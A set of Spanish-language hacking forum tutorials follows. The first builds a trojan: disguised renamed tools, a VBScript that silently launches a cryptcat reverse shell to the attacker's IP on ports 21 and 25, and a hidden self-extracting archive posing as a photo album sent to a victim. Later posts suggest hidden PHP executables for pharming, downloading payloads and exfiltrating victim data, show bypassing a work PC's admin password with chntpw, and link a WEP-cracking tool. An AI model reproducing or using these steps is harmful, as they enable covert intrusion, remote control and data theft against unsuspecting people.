ponemos todos los archivos en una carpeta y renombramos los archivos, algo que no sea comun por ejemplo run32dll, igfxdll, inetcpe, etc

en este caso kedará asi:

Código [Seleccionar] Expandir

cryptcat = run32dll
nircmd=igfxdll
script=inetcpe
foto = imon32



seguimos, en esta ocacion ocuparemos una shell volteada, esto kiere decir que ocuparemos los puertos 21 (ftp) y 25 (smtp) para que el firewall no nos moleste

el script que vamos a hacer es para que no aparezca la ventana de ms-dos al ejecutar la shell volteada en la pc victima.

el script es el siguiente:

Código [Seleccionar] Expandir

set cmd = createobject("wscript.shell")
Set shell = CreateObject("Scripting.FileSystemObject")
dta=" @echo off"&vbcrlf& _
"%c:\windows\system32%"&vbcrlf& _
"run32dll.exe NUESTRA-IP 21 |cmd.exe| run32dll.exe NUESTRA-IP 25"""
set b=shell.CreateTextFile("w.bat")
b.close
set d=shell.OpenTextFile("w.bat",2)
d.write dta
d.close
cmd.run "w.bat", vbHide

copiamos ese code en un block de notas, asegurense de cambiar donde dice "NUESTRA-IP" por su ip, recuerden que para hacer eso nos vamos a inicio-ejecutar-cmd y ahi ponemos ipconfig y nos dará nuestra ip
guardamos es script con el nombre de inetcpe.vbs

bien ya tenemos todo lo necesario, ahora solo nos keda juntarlo con el winrar de la sig manera:

seleccionamos los 4 archivos, click derecho y add to archive, o agregar al archivo



seleccionamos lo sig:
metodo de compresion: la mejor
crear archivo sfx

y borrar archivos despues de archivarlos



despues de esto, nos vamos a la pestaña "avanzado" y damos click en optiones sfx



donde dice: path to extract o localizacion de la extracción ponemos lo siguiente:
c:\widows\system32
esto es para que los archivos se extraigan dentro de la carpeta system32
y donde dice Run after extraction o ejecutar tras la estracción pones cualkier cosa



despues de esto, nos vamos a la pestaña modos y seleccionamos hide all o esconder todo y skip existing files o sobreescribir archivos



damos aceptar y nos vamos a la pestaña comentarios

nos saldrá una pantalla parecida a esta




vamos a modificar los comentarios de la sig forma:



damos aceptar y listo ya tenemos nuestro troyano creado

cambiamos el nombre a nuestro archivo por ejemplo en mi caso "album de fotos"



bien, ese archivo es el que le debemos de mandar a la victima
pero para eso antes nosotros debemos abrirl el cryptcat y poner lo siguiente:

abrimos el cryptcat y ponemos -vvlp 21
abrimos otra consola y ponemos lo siguiente -vvlp 25



una vez que le mandemos el archivo a la victima obtendremos shell

ejecuté el archivo en mi pc parta que vean y keda asi:

solo vemos la foto pero al mismo tiempo tenemos shell



una vez que tengamos shell, escribimos los comandos en la ventana donde pusimos esto -vvlp21 y en la otra ventana veran el resultado de la consulta.

ahora se preguntaran para que es el nircmd que pusimos al principio y al cual le pusimos el nombre de: igfxdll
bueno es para poder manejar un poco la pc de la victima, como por ejemplo
en la shell ponemos este comando:
igfxdll.exe open cdrom d:
y se la abrirá el cdrom a la victima ^^

weno con este programa se pueden hacer muchas maldades mas pero eso les toca a uds

espero les haya gustado el tuto


aki estan las herramientas

http://rapidshare.com/files/87150425/TUTO.rar.html

saludos

Devilboy

Bueno en este tuto les enseñaré solo lo básico de esta tecnica.

Si kieren poder usar todo su poder deben saber php y usar su imaginación.

El truco consiste solamente en escribir un codigo php y convertirlo en .exe

para esto necesitamos una herramienta llamada bamcompile: http://www.bambalam.se/bamcompile/

Nos descargámos el archivo y lo extraemos en algúna carpeta ya que este programa funciona desde la linea de comandos.


Inicio-ejecutar-cmd

Código [Seleccionar] Expandir

cd C:\Documents and Settings\Devilboy\Escritorio\bam

y para usarlo el comando es este:

Código [Seleccionar] Expandir

bamcompile.exe archivo.php archivo.exe

nos mostrará algo como esto:

Código [Seleccionar] Expandir

Bambalam PHP EXE Compiler/Embedder

Mainfile: archivo.php
Outfile: archivo.exe

Encoding and embedding archivo.php

archivo.exe created successfully!


Ahora un ejemplo, creamos el archivo.php con este code:

Código [Seleccionar] Expandir

<?php

    $control = fopen("miarchivo.txt","w+");  
    if($control == false){  
      die("No se ha podido crear el archivo.");  
   }  

fwrite($control,"ssssssssssssssssssssssssssssss");

?>

y repetimos el comando:

Código [Seleccionar] Expandir

bamcompile.exe archivo.php archivo.exe

y ejecutámos el archivo.exe, despues de unos segundo se nos crea el archivo.txt.

pero, ¿xq se ve la pantalla de ms-dos al ejecutar el .exe?

Bueno solo agreguémos -w al crear el archivo:

Código [Seleccionar] Expandir

bamcompile.exe -w archivo.php archivo.exe

Ahora ejecutamos de nuevo y vemos que la pantalla ya no aparece xD

Bueno esto solo ha sido una introducción ya que se puede usar para muchas cosas lindas, les voy a dar unas ideas.

-Para pharming, con un code muy simple se puede cambiar el archivo host
-Para hacer un downloader, osea subir nuestro server en un host ftp y con php hacer que se descargue y se ejecute
-para hacer un uploader, a diferencia del anterios es que este subiria a nuestro host ftp la info que kisieramos de la makina victima
etc, pero eso ya depende de uds

Espero les haya gustado este intro

salu2

Devilboy

Bueno esto es por si la pc de tu trabajo esta blokeada y no te deja instalar nada sino tienes permisos de admin  .

Booteamos Linux Mint, ubuntu o bt4

accedemos a la consola y tecleamos lo sig.

Código [Seleccionar] Expandir

sudo apt-get install chntpw

ahora montamos el disco duro de windows desde carpetas una vez montada accedemos a la consola y navegamos hacia la carpeta config de windows:

Código [Seleccionar] Expandir

cd /mtn/hda1/Windows/System32/config

Listamos los usuarios:

Código [Seleccionar] Expandir

chntpwd -l SAM

Kitamos el pass o ponemos otro

Código [Seleccionar] Expandir

chntpwd -u Administrador

y presionamos el 1 para borrar el pass o 2 para cambiarlo.

reiniciamos y nos logeamos en winbugs usando el usuario: Administrador pero sin contraseña.

Nota: Tambien funciona en windows 7

Devilboy

Un video que acabo de hacer sobre como crackear WEP´s pero me manera mucho mas facil.

Espero les gustes  

[youtube=425,350]8VdN-2ru9Po[/youtube]
http://www.youtube.com/watch?v=8VdN-2ru9Po



Aki el link de la Tool
http://sourceforge.net/projects/wepcrackgui/

link actualizado, el video no estaba completo